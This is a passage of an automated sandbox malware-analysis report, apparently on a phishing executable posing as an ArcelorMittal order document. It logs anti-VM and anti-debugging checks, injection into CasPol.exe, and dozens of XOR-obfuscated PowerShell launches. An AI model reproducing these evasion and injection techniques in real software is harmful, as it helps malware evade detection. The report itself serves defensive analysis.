            Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, 00000001.00000002.63200107571.00000000031A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, 00000001.00000002.63200107571.00000000031A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOKERNELBASE.DLLSHELL32ADVAPI32TEMP=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLL
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe TID: 6644Thread sleep time: -32300s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6080Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA1EFB rdtsc 1_2_02FA1EFB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9940
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_00406375 FindFirstFileW,FindClose,1_2_00406375
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_00405823 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405823
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_004027FB FindFirstFileW,1_2_004027FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeSystem information queried: ModuleInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeAPI call chain: ExitProcess graph end nodegraph_1-14026
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeAPI call chain: ExitProcess graph end nodegraph_1-14029
            Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, 00000001.00000002.63200331292.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, 00000001.00000002.63200331292.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, 00000001.00000002.63200331292.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
            Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, 00000001.00000002.63200331292.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, 00000001.00000002.63198298116.00000000009B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exexe&
            Source: CasPol.exe, 00000097.00000002.67422794406.000000000102B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
            Source: CasPol.exe, 00000097.00000002.67423364992.0000000001084000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWQ
            Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, 00000001.00000002.63200331292.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, 00000001.00000002.63200331292.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, 00000001.00000002.63198062072.0000000000988000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exee
            Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, 00000001.00000002.63200331292.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
            Source: CasPol.exe, 00000097.00000002.67423364992.0000000001084000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, 00000001.00000002.63200107571.00000000031A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, 00000001.00000002.63200331292.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, 00000001.00000002.63200331292.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, 00000001.00000002.63200331292.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, 00000001.00000002.63200107571.00000000031A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoKERNELBASE.DLLshell32advapi32TEMP=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dll
            Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, 00000001.00000002.63200331292.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,1_2_10001B18
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA1EFB rdtsc 1_2_02FA1EFB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA8AC0 mov eax, dword ptr fs:[00000030h]1_2_02FA8AC0
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA8A45 mov eax, dword ptr fs:[00000030h]1_2_02FA8A45
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FAD7F0 mov eax, dword ptr fs:[00000030h]1_2_02FAD7F0
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA8B9E mov eax, dword ptr fs:[00000030h]1_2_02FA8B9E
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA8B20 mov eax, dword ptr fs:[00000030h]1_2_02FA8B20
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA8C16 mov ebx, dword ptr fs:[00000030h]1_2_02FA8C16
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA8C16 mov eax, dword ptr fs:[00000030h]1_2_02FA8C16
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FAF1DA mov eax, dword ptr fs:[00000030h]1_2_02FAF1DA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FAD80A LdrLoadDll,1_2_02FAD80A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: F00000Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656C3197 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3A3A41D7 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656176C0 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x46696EC0 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x41286F85 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x78383295 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30303295 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x302C22CC -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20302E85 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20692291 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x41286F85 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C206B85 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30296B8B -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x723322FC -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656C3197 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3A3A54CC -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x727477C4 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6C416EC9 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6F632ACC -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x302C6B85 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30783395 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30303295 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C206B85 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30783195 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30302E85 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x692032DD -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x34302BD5 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2E7233FC -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656C3197 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x74466BC9 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x65506DCC -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6E7467D7 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x28697096 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C206B85 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x31343091 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x202C22CC -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20302ECC -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20302BCC -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2E7230FC -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x616444CC -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6C652ACC -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x72332E85 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x69207094 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C206B85 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30303295 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C2A6B85 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x65506DCC -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20302BCC -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x757367D7 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3332389F -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x43616EC9 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3A3A41D7 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6F63438D -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C692295 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C692295 -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2E7230FC -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x302C22CC -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20302BFC -bxor 677Jump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
